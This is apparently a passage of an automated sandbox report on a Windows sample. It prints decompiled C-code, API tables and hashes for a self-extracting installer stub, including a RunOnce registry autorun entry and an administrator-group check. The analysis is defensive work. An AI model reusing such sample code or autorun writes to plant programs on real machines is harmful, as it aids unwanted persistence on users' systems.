                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                    • String ID: LoadString() Error. Could not load string resource.$nst0dum
                                                                                                                                                                                                    • API String ID: 3244514340-614204707
                                                                                                                                                                                                    • Opcode ID: ec0023d1a5f0d37d78df7b2679e94d4187c2c5aabeab4dbc205342bdc49bad65
                                                                                                                                                                                                    • Instruction ID: 3ce42835398d59984abe3e70ac62dbc6599987278d42b0f9208ab3ed1e3bd8f1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec0023d1a5f0d37d78df7b2679e94d4187c2c5aabeab4dbc205342bdc49bad65
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68510572901119ABDB219F68DC48BAABB7BEF45310F0C4196FC19A7341DB35ED05EB50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00FD2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v269;
                                                                                                                                                                                                    				CHAR* _v276;
                                                                                                                                                                                                    				int _v280;
                                                                                                                                                                                                    				void* _v284;
                                                                                                                                                                                                    				int _v288;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                    				int* _t50;
                                                                                                                                                                                                    				CHAR* _t52;
                                                                                                                                                                                                    				CHAR* _t61;
                                                                                                                                                                                                    				char* _t62;
                                                                                                                                                                                                    				int _t63;
                                                                                                                                                                                                    				CHAR* _t64;
                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t52 = __ecx;
                                                                                                                                                                                                    				_t23 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                    				_t62 = _a4;
                                                                                                                                                                                                    				_t50 = 0;
                                                                                                                                                                                                    				_t61 = __ecx;
                                                                                                                                                                                                    				_v276 = _t62;
                                                                                                                                                                                                    				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                    				if( *_t62 != 0x23) {
                                                                                                                                                                                                    					_t63 = 0x104;
                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t64 = _t62 + 1;
                                                                                                                                                                                                    					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                    					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                    					_t63 = 0x104;
                                                                                                                                                                                                    					_t34 = _v269;
                                                                                                                                                                                                    					if(_t34 == 0x53) {
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_t34 == 0x57) {
                                                                                                                                                                                                    							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_push(_t52);
                                                                                                                                                                                                    							_v288 = 0x104;
                                                                                                                                                                                                    							E00FD1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                    							_t59 = 0x104;
                                                                                                                                                                                                    							E00FD658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                    							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                    								_t59 = _t63;
                                                                                                                                                                                                    								E00FD658A(_t61, _t63, _v276);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								if(RegQueryValueExA(_v284, 0xfd1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                    									_t45 = _v280;
                                                                                                                                                                                                    									if(_t45 != 2) {
                                                                                                                                                                                                    										L9:
                                                                                                                                                                                                    										if(_t45 == 1) {
                                                                                                                                                                                                    											goto L10;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                    											_t45 = _v280;
                                                                                                                                                                                                    											goto L9;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t59 = 0x104;
                                                                                                                                                                                                    											E00FD1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                    											L10:
                                                                                                                                                                                                    											_t50 = 1;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								RegCloseKey(_v284);
                                                                                                                                                                                                    								L15:
                                                                                                                                                                                                    								if(_t50 == 0) {
                                                                                                                                                                                                    									goto L16;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                    			}























                                                                                                                                                                                                    0x00fd2773
                                                                                                                                                                                                    0x00fd277e
                                                                                                                                                                                                    0x00fd2785
                                                                                                                                                                                                    0x00fd278a
                                                                                                                                                                                                    0x00fd278d
                                                                                                                                                                                                    0x00fd2790
                                                                                                                                                                                                    0x00fd2792
                                                                                                                                                                                                    0x00fd2798
                                                                                                                                                                                                    0x00fd279d
                                                                                                                                                                                                    0x00fd28b2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd27a3
                                                                                                                                                                                                    0x00fd27a3
                                                                                                                                                                                                    0x00fd27af
                                                                                                                                                                                                    0x00fd27c2
                                                                                                                                                                                                    0x00fd27c8
                                                                                                                                                                                                    0x00fd27cd
                                                                                                                                                                                                    0x00fd27d5
                                                                                                                                                                                                    0x00fd28b7
                                                                                                                                                                                                    0x00fd28b9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd27db
                                                                                                                                                                                                    0x00fd27dd
                                                                                                                                                                                                    0x00fd28aa
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd27e3
                                                                                                                                                                                                    0x00fd27e3
                                                                                                                                                                                                    0x00fd27ec
                                                                                                                                                                                                    0x00fd27f8
                                                                                                                                                                                                    0x00fd2803
                                                                                                                                                                                                    0x00fd280b
                                                                                                                                                                                                    0x00fd2831
                                                                                                                                                                                                    0x00fd28c3
                                                                                                                                                                                                    0x00fd28c9
                                                                                                                                                                                                    0x00fd28cd
                                                                                                                                                                                                    0x00fd2837
                                                                                                                                                                                                    0x00fd285a
                                                                                                                                                                                                    0x00fd285c
                                                                                                                                                                                                    0x00fd2865
                                                                                                                                                                                                    0x00fd2892
                                                                                                                                                                                                    0x00fd2895
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2867
                                                                                                                                                                                                    0x00fd2878
                                                                                                                                                                                                    0x00fd288c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd287a
                                                                                                                                                                                                    0x00fd2880
                                                                                                                                                                                                    0x00fd2885
                                                                                                                                                                                                    0x00fd2897
                                                                                                                                                                                                    0x00fd2899
                                                                                                                                                                                                    0x00fd2899
                                                                                                                                                                                                    0x00fd2878
                                                                                                                                                                                                    0x00fd2865
                                                                                                                                                                                                    0x00fd28a0
                                                                                                                                                                                                    0x00fd28bf
                                                                                                                                                                                                    0x00fd28c1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd28c1
                                                                                                                                                                                                    0x00fd2831
                                                                                                                                                                                                    0x00fd27dd
                                                                                                                                                                                                    0x00fd27d5
                                                                                                                                                                                                    0x00fd28e5

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharUpperA.USER32(42DE454F,00000000,00000000,00000000), ref: 00FD27A8
                                                                                                                                                                                                    • CharNextA.USER32(0000054D), ref: 00FD27B5
                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 00FD27BC
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD2829
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00FD1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD2852
                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD2870
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD28A0
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00FD28AA
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00FD28B9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00FD27E4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                    • API String ID: 2659952014-2428544900
                                                                                                                                                                                                    • Opcode ID: bcf41a5e03c9c23c13db4fa8aaeb6512ac317a44b72ee83f4e2e768742f11790
                                                                                                                                                                                                    • Instruction ID: e10426996bddcc3dbb33471062768486d787a8bbc5745bfaaa7ccf9be52a30b6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcf41a5e03c9c23c13db4fa8aaeb6512ac317a44b72ee83f4e2e768742f11790
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F841A471D0012CAFDB649B64DC45AEE77BEEB25710F0840A7F545D2210DB708E85BFA5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                    			E00FD2267() {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v836;
                                                                                                                                                                                                    				void* _v840;
                                                                                                                                                                                                    				int _v844;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                    				intOrPtr* _t42;
                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t19 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                    				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                    				if( *0xfd8530 != 0) {
                                                                                                                                                                                                    					_push(_t49);
                                                                                                                                                                                                    					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                    						_push(_t38);
                                                                                                                                                                                                    						_v844 = 0x238;
                                                                                                                                                                                                    						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                    							_push(_t47);
                                                                                                                                                                                                    							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                    							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    								E00FD658A( &_v268, 0x104, 0xfd1140);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                    							E00FD171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                    							_t42 =  &_v836;
                                                                                                                                                                                                    							_t45 = _t42 + 1;
                                                                                                                                                                                                    							_pop(_t47);
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t33 =  *_t42;
                                                                                                                                                                                                    								_t42 = _t42 + 1;
                                                                                                                                                                                                    							} while (_t33 != 0);
                                                                                                                                                                                                    							RegSetValueExA(_v840, "wextract_cleanup3", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                    						_pop(_t38);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_pop(_t49);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x00fd2272
                                                                                                                                                                                                    0x00fd2277
                                                                                                                                                                                                    0x00fd2279
                                                                                                                                                                                                    0x00fd2283
                                                                                                                                                                                                    0x00fd2289
                                                                                                                                                                                                    0x00fd22ab
                                                                                                                                                                                                    0x00fd22b1
                                                                                                                                                                                                    0x00fd22c4
                                                                                                                                                                                                    0x00fd22e0
                                                                                                                                                                                                    0x00fd22e6
                                                                                                                                                                                                    0x00fd22f5
                                                                                                                                                                                                    0x00fd230d
                                                                                                                                                                                                    0x00fd231c
                                                                                                                                                                                                    0x00fd231c
                                                                                                                                                                                                    0x00fd2321
                                                                                                                                                                                                    0x00fd233a
                                                                                                                                                                                                    0x00fd2342
                                                                                                                                                                                                    0x00fd2348
                                                                                                                                                                                                    0x00fd234b
                                                                                                                                                                                                    0x00fd234c
                                                                                                                                                                                                    0x00fd234c
                                                                                                                                                                                                    0x00fd234e
                                                                                                                                                                                                    0x00fd234f
                                                                                                                                                                                                    0x00fd236e
                                                                                                                                                                                                    0x00fd236e
                                                                                                                                                                                                    0x00fd237a
                                                                                                                                                                                                    0x00fd2380
                                                                                                                                                                                                    0x00fd2380
                                                                                                                                                                                                    0x00fd2381
                                                                                                                                                                                                    0x00fd2381
                                                                                                                                                                                                    0x00fd238f

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00FD22A3
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000000,?,?,00000001), ref: 00FD22D8
                                                                                                                                                                                                    • memset.MSVCRT ref: 00FD22F5
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00FD2305
                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00FD236E
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00FD237A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00FD2299
                                                                                                                                                                                                    • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00FD232D
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00FD2321
                                                                                                                                                                                                    • wextract_cleanup3, xrefs: 00FD227C, 00FD22CD, 00FD2363
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup3
                                                                                                                                                                                                    • API String ID: 3027380567-1707933020
                                                                                                                                                                                                    • Opcode ID: 5e02fa865a74b0f25d366f4fd99bbbc9cca1608c196484b74a40b74557511fad
                                                                                                                                                                                                    • Instruction ID: ea77913d49f1b7e8accb2c8f7307aabb5c675ae7e3cf505cbde678c177faef68
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e02fa865a74b0f25d366f4fd99bbbc9cca1608c196484b74a40b74557511fad
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0312931A0021C6BCB219B60DC49FDA7B7EEF14350F0801E7F50DE6140EA75AF89EA90
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                    			E00FD3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                    				struct HWND__* _t16;
                                                                                                                                                                                                    				struct HWND__* _t33;
                                                                                                                                                                                                    				struct HWND__* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t8 = _a8 - 0xf;
                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                    					if( *0xfd8590 == 0) {
                                                                                                                                                                                                    						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                    						 *0xfd8590 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 = _t8 - 1;
                                                                                                                                                                                                    				if(_t11 == 0) {
                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                    					EndDialog(_a4, ??);
                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t15 = _t11 - 0x100;
                                                                                                                                                                                                    				if(_t15 == 0) {
                                                                                                                                                                                                    					_t16 = GetDesktopWindow();
                                                                                                                                                                                                    					_t33 = _a4;
                                                                                                                                                                                                    					E00FD43D0(_t33, _t16);
                                                                                                                                                                                                    					SetDlgItemTextA(_t33, 0x834,  *0xfd8d4c);
                                                                                                                                                                                                    					SetWindowTextA(_t33, "nst0dum");
                                                                                                                                                                                                    					SetForegroundWindow(_t33);
                                                                                                                                                                                                    					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                    					 *0xfd88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                    					SetWindowLongA(_t34, 0xfffffffc, E00FD30C0);
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t15 != 1) {
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_a12 != 6) {
                                                                                                                                                                                                    					if(_a12 != 7) {
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                    			}









                                                                                                                                                                                                    0x00fd3108
                                                                                                                                                                                                    0x00fd310b
                                                                                                                                                                                                    0x00fd31b7
                                                                                                                                                                                                    0x00fd31ca
                                                                                                                                                                                                    0x00fd31d0
                                                                                                                                                                                                    0x00fd31d0
                                                                                                                                                                                                    0x00fd31da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd31da
                                                                                                                                                                                                    0x00fd3111
                                                                                                                                                                                                    0x00fd3114
                                                                                                                                                                                                    0x00fd3136
                                                                                                                                                                                                    0x00fd3136
                                                                                                                                                                                                    0x00fd3138
                                                                                                                                                                                                    0x00fd313b
                                                                                                                                                                                                    0x00fd3141
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3143
                                                                                                                                                                                                    0x00fd3116
                                                                                                                                                                                                    0x00fd311b
                                                                                                                                                                                                    0x00fd314b
                                                                                                                                                                                                    0x00fd3151
                                                                                                                                                                                                    0x00fd3158
                                                                                                                                                                                                    0x00fd316a
                                                                                                                                                                                                    0x00fd3176
                                                                                                                                                                                                    0x00fd317d
                                                                                                                                                                                                    0x00fd318b
                                                                                                                                                                                                    0x00fd319e
                                                                                                                                                                                                    0x00fd31a3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd31ad
                                                                                                                                                                                                    0x00fd3120
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd312a
                                                                                                                                                                                                    0x00fd3134
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3134
                                                                                                                                                                                                    0x00fd312c
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00FD313B
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00FD314B
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000834), ref: 00FD316A
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 00FD3176
                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00FD317D
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000834), ref: 00FD3185
                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000FC), ref: 00FD3190
                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,00FD30C0), ref: 00FD31A3
                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00FD31CA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                    • String ID: nst0dum
                                                                                                                                                                                                    • API String ID: 3785188418-432003757
                                                                                                                                                                                                    • Opcode ID: d459e7ede6f7eb3bd8e525efab923770dcf8a801bb61fef5391b136d9ec04d79
                                                                                                                                                                                                    • Instruction ID: a2a5d442067bef276bafa769186b17958fad10fccfca955c978703e9bf96467c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d459e7ede6f7eb3bd8e525efab923770dcf8a801bb61fef5391b136d9ec04d79
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D11E73290611ABBDB115F74AC0CB5A3B67EB46731F140213FA11D22E0DB709641FB4B
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                    			E00FD18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				short _v12;
                                                                                                                                                                                                    				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				long _t45;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				void* _t52;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t51 = __esi;
                                                                                                                                                                                                    				_t49 = __edx;
                                                                                                                                                                                                    				_t23 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                    				_t25 =  *0xfd8128; // 0x2
                                                                                                                                                                                                    				_t45 = 0;
                                                                                                                                                                                                    				_v12 = 0x500;
                                                                                                                                                                                                    				_t50 = 2;
                                                                                                                                                                                                    				_v16.Value = 0;
                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                    				if(_t25 != _t50) {
                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                    					return E00FD6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(E00FD17EE( &_v20) != 0) {
                                                                                                                                                                                                    					_t25 = _v20;
                                                                                                                                                                                                    					if(_v20 != 0) {
                                                                                                                                                                                                    						 *0xfd8128 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                    					L17:
                                                                                                                                                                                                    					CloseHandle(_v28);
                                                                                                                                                                                                    					_t25 = _v20;
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_push(__esi);
                                                                                                                                                                                                    					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                    					if(_t52 == 0) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						_pop(_t51);
                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                    						LocalFree(_t52);
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if( *_t52 <= 0) {
                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                    							FreeSid(_v32);
                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                    						_t50 = _t15;
                                                                                                                                                                                                    						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                    							_t45 = _t45 + 1;
                                                                                                                                                                                                    							_t50 = _t50 + 8;
